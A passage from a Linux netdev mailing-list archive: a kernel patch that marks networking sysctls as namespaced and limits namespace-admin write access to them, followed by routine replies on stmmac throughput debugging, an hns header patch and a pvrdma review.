 		table[i].data += (char *)p - (char *)&ipv6_devconf;
 		table[i].extra1 = idev; /* embedded; no ref */
 		table[i].extra2 = net;
+		table[i].namespaced = true;
 	}
 
 	snprintf(path, sizeof(path), "net/ipv6/conf/%s", dev_name);
diff --git a/net/ipv6/icmp.c b/net/ipv6/icmp.c
index bd59c34..8c5d737 100644
--- a/net/ipv6/icmp.c
+++ b/net/ipv6/icmp.c
@@ -1067,6 +1067,7 @@ static struct ctl_table ipv6_icmp_table_template[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_ms_jiffies,
+		.namespaced	= true,
 	},
 	{ },
 };
diff --git a/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c b/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c
index 660bc10..4a45fd9 100644
--- a/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c
+++ b/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c
@@ -331,6 +331,7 @@ static struct ctl_table icmpv6_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
index e4347ae..b09f454 100644
--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
+++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
@@ -72,6 +72,7 @@ static struct ctl_table nf_ct_frag6_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_frag6_low_thresh",
@@ -80,7 +81,8 @@ static struct ctl_table nf_ct_frag6_sysctl_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
-		.extra2		= &init_net.nf_frag.frags.high_thresh
+		.extra2		= &init_net.nf_frag.frags.high_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_frag6_high_thresh",
@@ -88,7 +90,8 @@ static struct ctl_table nf_ct_frag6_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &init_net.nf_frag.frags.low_thresh
+		.extra1		= &init_net.nf_frag.frags.low_thresh,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv6/sysctl_net_ipv6.c b/net/ipv6/sysctl_net_ipv6.c
index 69c50e7..9e482a2 100644
--- a/net/ipv6/sysctl_net_ipv6.c
+++ b/net/ipv6/sysctl_net_ipv6.c
@@ -30,21 +30,24 @@ static struct ctl_table ipv6_table_template[] = {
 		.data		= &init_net.ipv6.sysctl.bindv6only,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "anycast_src_echo_reply",
 		.data		= &init_net.ipv6.sysctl.anycast_src_echo_reply,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "flowlabel_consistency",
 		.data		= &init_net.ipv6.sysctl.flowlabel_consistency,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "auto_flowlabels",
@@ -53,14 +56,16 @@ static struct ctl_table ipv6_table_template[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &auto_flowlabels_min,
-		.extra2		= &auto_flowlabels_max
+		.extra2		= &auto_flowlabels_max,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "fwmark_reflect",
 		.data		= &init_net.ipv6.sysctl.fwmark_reflect,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "idgen_retries",
@@ -68,6 +73,7 @@ static struct ctl_table ipv6_table_template[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "idgen_delay",
@@ -75,20 +81,23 @@ static struct ctl_table ipv6_table_template[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "flowlabel_state_ranges",
 		.data		= &init_net.ipv6.sysctl.flowlabel_state_ranges,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_nonlocal_bind",
 		.data		= &init_net.ipv6.sysctl.ip_nonlocal_bind,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv6/xfrm6_policy.c b/net/ipv6/xfrm6_policy.c
index 70a86ad..7cadc2e 100644
--- a/net/ipv6/xfrm6_policy.c
+++ b/net/ipv6/xfrm6_policy.c
@@ -321,6 +321,7 @@ static struct ctl_table xfrm6_policy_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler   = proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c
index 5c161e7..ce00a55 100644
--- a/net/mpls/af_mpls.c
+++ b/net/mpls/af_mpls.c
@@ -863,6 +863,7 @@ static const struct ctl_table mpls_dev_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
 		.data		= MPLS_PERDEV_SYSCTL_OFFSET(input_enabled),
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -1648,6 +1649,7 @@ static const struct ctl_table mpls_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= mpls_platform_labels,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
index c3c809b..0d325cf 100644
--- a/net/netfilter/ipvs/ip_vs_ctl.c
+++ b/net/netfilter/ipvs/ip_vs_ctl.c
@@ -1734,24 +1734,28 @@ static struct ctl_table vs_vars[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "am_droprate",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "drop_entry",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_do_defense_mode,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "drop_packet",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_do_defense_mode,
+		.namespaced	= true,
 	},
 #ifdef CONFIG_IP_VS_NFCT
 	{
@@ -1759,6 +1763,7 @@ static struct ctl_table vs_vars[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_dointvec,
+		.namespaced	= true,
 	},
 #endif
 	{
@@ -1766,72 +1771,84 @@ static struct ctl_table vs_vars[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_do_defense_mode,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "snat_reroute",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_version",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_do_sync_mode,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_ports",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_do_sync_ports,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_persist_mode",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_qlen_max",
 		.maxlen		= sizeof(unsigned long),
 		.mode		= 0644,
 		.proc_handler	= proc_doulongvec_minmax,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_sock_size",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "cache_bypass",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "expire_nodest_conn",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sloppy_tcp",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sloppy_sctp",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "expire_quiescent_template",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_threshold",
@@ -1839,12 +1856,14 @@ static struct ctl_table vs_vars[] = {
 			sizeof(((struct netns_ipvs *)0)->sysctl_sync_threshold),
 		.mode		= 0644,
 		.proc_handler	= proc_do_sync_threshold,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_refresh_period",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_retries",
@@ -1853,42 +1872,49 @@ static struct ctl_table vs_vars[] = {
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
 		.extra2		= &three,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nat_icmp_send",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "pmtu_disc",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "backup_only",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "conn_reuse_mode",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "schedule_icmp",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ignore_tunneled",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 #ifdef CONFIG_IP_VS_DEBUG
 	{
diff --git a/net/netfilter/nf_conntrack_proto_generic.c b/net/netfilter/nf_conntrack_proto_generic.c
index 86dc752..3f80df5 100644
--- a/net/netfilter/nf_conntrack_proto_generic.c
+++ b/net/netfilter/nf_conntrack_proto_generic.c
@@ -148,6 +148,7 @@ static struct ctl_table generic_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -158,6 +159,7 @@ static struct ctl_table generic_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
index 1d7ab96..c260427 100644
--- a/net/netfilter/nf_conntrack_proto_sctp.c
+++ b/net/netfilter/nf_conntrack_proto_sctp.c
@@ -654,54 +654,63 @@ static struct ctl_table sctp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_cookie_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_cookie_echoed",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_shutdown_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_shutdown_recd",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_shutdown_ack_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_heartbeat_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_heartbeat_acked",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -713,42 +722,49 @@ static struct ctl_table sctp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_cookie_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_cookie_echoed",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_shutdown_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_shutdown_recd",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_shutdown_ack_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
index 70c8381..2ca7d20 100644
--- a/net/netfilter/nf_conntrack_proto_tcp.c
+++ b/net/netfilter/nf_conntrack_proto_tcp.c
@@ -1406,78 +1406,91 @@ static struct ctl_table tcp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_syn_recv",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_fin_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_close_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_last_ack",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_time_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_close",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_unacknowledged",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_loose",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname       = "nf_conntrack_tcp_be_liberal",
 		.maxlen         = sizeof(unsigned int),
 		.mode           = 0644,
 		.proc_handler   = proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -1489,78 +1502,91 @@ static struct ctl_table tcp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_syn_sent2",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_syn_recv",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_fin_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_close_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_last_ack",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_time_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_close",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_loose",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_be_liberal",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_udp.c b/net/netfilter/nf_conntrack_proto_udp.c
index 4fd0405..ab1773f 100644
--- a/net/netfilter/nf_conntrack_proto_udp.c
+++ b/net/netfilter/nf_conntrack_proto_udp.c
@@ -209,12 +209,14 @@ static struct ctl_table udp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_udp_timeout_stream",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -225,12 +227,14 @@ static struct ctl_table udp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_udp_timeout_stream",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_udplite.c b/net/netfilter/nf_conntrack_proto_udplite.c
index 9d692f5..17bb377 100644
--- a/net/netfilter/nf_conntrack_proto_udplite.c
+++ b/net/netfilter/nf_conntrack_proto_udplite.c
@@ -224,12 +224,14 @@ static struct ctl_table udplite_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_udplite_timeout_stream",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..78a69e2 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -481,6 +481,7 @@ static int netfilter_log_sysctl_init(struct net *net)
 				nf_log_proc_dostring;
 			nf_log_sysctl_table[i].extra1 =
 				(void *)(unsigned long) i;
+			nf_log_sysctl_table[i].namespaced = true;
 		}
 	}
 
diff --git a/net/rds/tcp.c b/net/rds/tcp.c
index fcddacc..74a73e8 100644
--- a/net/rds/tcp.c
+++ b/net/rds/tcp.c
@@ -68,6 +68,7 @@ static struct ctl_table rds_tcp_sysctl_table[] = {
 		.mode           = 0644,
 		.proc_handler   = rds_tcp_skbuf_handler,
 		.extra1		= &rds_tcp_min_sndbuf,
+		.namespaced	= true,
 	},
 #define	RDS_TCP_RCVBUF	1
 	{
@@ -77,6 +78,7 @@ static struct ctl_table rds_tcp_sysctl_table[] = {
 		.mode           = 0644,
 		.proc_handler   = rds_tcp_skbuf_handler,
 		.extra1		= &rds_tcp_min_rcvbuf,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/sctp/sysctl.c b/net/sctp/sysctl.c
index daf8554..5d676e8 100644
--- a/net/sctp/sysctl.c
+++ b/net/sctp/sysctl.c
@@ -473,8 +473,10 @@ int sctp_sysctl_net_register(struct net *net)
 	if (!table)
 		return -ENOMEM;
 
-	for (i = 0; table[i].data; i++)
+	for (i = 0; table[i].data; i++) {
 		table[i].data += (char *)(&net->sctp) - (char *)&init_net.sctp;
+		table[i].namespaced = true;
+	}
 
 	net->sctp.sysctl_header = register_net_sysctl(net, "net/sctp", table);
 	if (net->sctp.sysctl_header == NULL) {
diff --git a/net/sysctl_net.c b/net/sysctl_net.c
index 46a71c7..dd6742b 100644
--- a/net/sysctl_net.c
+++ b/net/sysctl_net.c
@@ -45,16 +45,24 @@ static int net_ctl_permissions(struct ctl_table_header *head,
 	kuid_t root_uid = make_kuid(net->user_ns, 0);
 	kgid_t root_gid = make_kgid(net->user_ns, 0);
 
-	/* Allow network administrator to have same access as root. */
-	if (ns_capable_noaudit(net->user_ns, CAP_NET_ADMIN) ||
-	    uid_eq(root_uid, current_euid())) {
-		int mode = (table->mode >> 6) & 7;
-		return (mode << 6) | (mode << 3) | mode;
-	}
-	/* Allow netns root group to have the same access as the root group */
-	if (in_egroup_p(root_gid)) {
-		int mode = (table->mode >> 3) & 7;
-		return (mode << 3) | mode;
+	/* Allow network administrator to have same access as root - but only if
+	 * namespacing is implemented for this sysctl.
+	 */
+	if (table->namespaced) {
+		if (ns_capable_noaudit(net->user_ns, CAP_NET_ADMIN) ||
+		    uid_eq(root_uid, current_euid())) {
+			int mode = (table->mode >> 6) & 7;
+
+			return (mode << 6) | (mode << 3) | mode;
+		}
+		/* Allow netns root group to have the same access as the root
+		 * group.
+		 */
+		if (in_egroup_p(root_gid)) {
+			int mode = (table->mode >> 3) & 7;
+
+			return (mode << 3) | mode;
+		}
 	}
 	return table->mode;
 }
-- 
2.1.4

^ permalink raw reply related

* Re: stmmac/RTL8211F/Meson GXBB: TX throughput problems
From: André Roth @ 2016-09-18 20:42 UTC (permalink / raw)
  To: Giuseppe CAVALLARO
  Cc: Martin Blumenstingl, netdev, linux-amlogic, Alexandre Torgue
In-Reply-To: <ce15ad26-2d07-655d-b813-947ad86696ac@st.com>


Hello,

> For example, you could try disabling the scatter-gather or tx-cum
> via ethtool and seeing if there is some benefit; so we could image
> some problem on your HW or SYNP MAC integration for checksumming
> on tx side.

disabling the following: 
  ethtool -K eth0 sg off    
or:
  ethtool -K eth0 tx off    
does not prevent the network communication going down..

> Also you could check the AXI tuning and PBL value. To be honest
> (thinking about your problem) I can actually suspect some related
> problem on bus setup. So I suggest you to play with these value
> (better if you ask for having values from HW validation on your side).
> Otherwise the stmmac uses a default that cannot be good for your
> platform. For example, sometime I have seen that PBL is better if
> reduced to 8 instead of 32 and w/o 4xPBL...

how can I set those values ?

thanks for your time,

 andre

^ permalink raw reply

* Re: [PATCH] net: hns: add function declarations in hns_dsaf_mac.h
From: Arnd Bergmann @ 2016-09-18 20:37 UTC (permalink / raw)
  To: Baoyou Xie
  Cc: yisen.zhuang, salil.mehta, davem, yankejian, huangdaode,
	lipeng321, netdev, linux-kernel, xie.baoyou
In-Reply-To: <1474189896-20417-1-git-send-email-baoyou.xie@linaro.org>

On Sunday, September 18, 2016 5:11:36 PM CEST Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:246:6: warning: no previous prototype for 'hns_dsaf_srst_chns' [-Wmissing-prototypes]
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:276:6: warning: no previous prototype for 'hns_dsaf_roce_srst' [-Wmissing-prototypes]
> 
> In fact, these two functions are not declared in any file, but should
> be declared in a header file, thus can be recognized in other file.
> 
> So this patch adds the declarations into
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
> 
> Signed-off-by: Baoyou Xie <baoyou.xie@linaro.org>
> 

Why can't these be declared static?

	Arnd

^ permalink raw reply

* RE: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues
From: Adit Ranadive @ 2016-09-18 20:36 UTC (permalink / raw)
  To: Leon Romanovsky, Yuval Shaia
  Cc: dledford@redhat.com, linux-rdma@vger.kernel.org, pv-drivers,
	netdev@vger.kernel.org, linux-pci@vger.kernel.org,
	Jorgen S. Hansen, Aditya Sarwade, George Zhang, Bryan Tan
In-Reply-To: <20160918170707.GL2923@leon.nu>

On Sun, Sep 18, 2016 at 10:07:18 -0700, Leon Romanovsky wrote: 
> On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> > Hi Adit,
> > Please see my comments inline.
> >
> > Besides that I have no more comment for this patch.
> >
> > Reviewed-by: Yuval Shaia <yuval.shaia@oracle.com>
> >
> > Yuval
> >
> > On Thu, Sep 15, 2016 at 12:07:29AM +0000, Adit Ranadive wrote:
> > > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
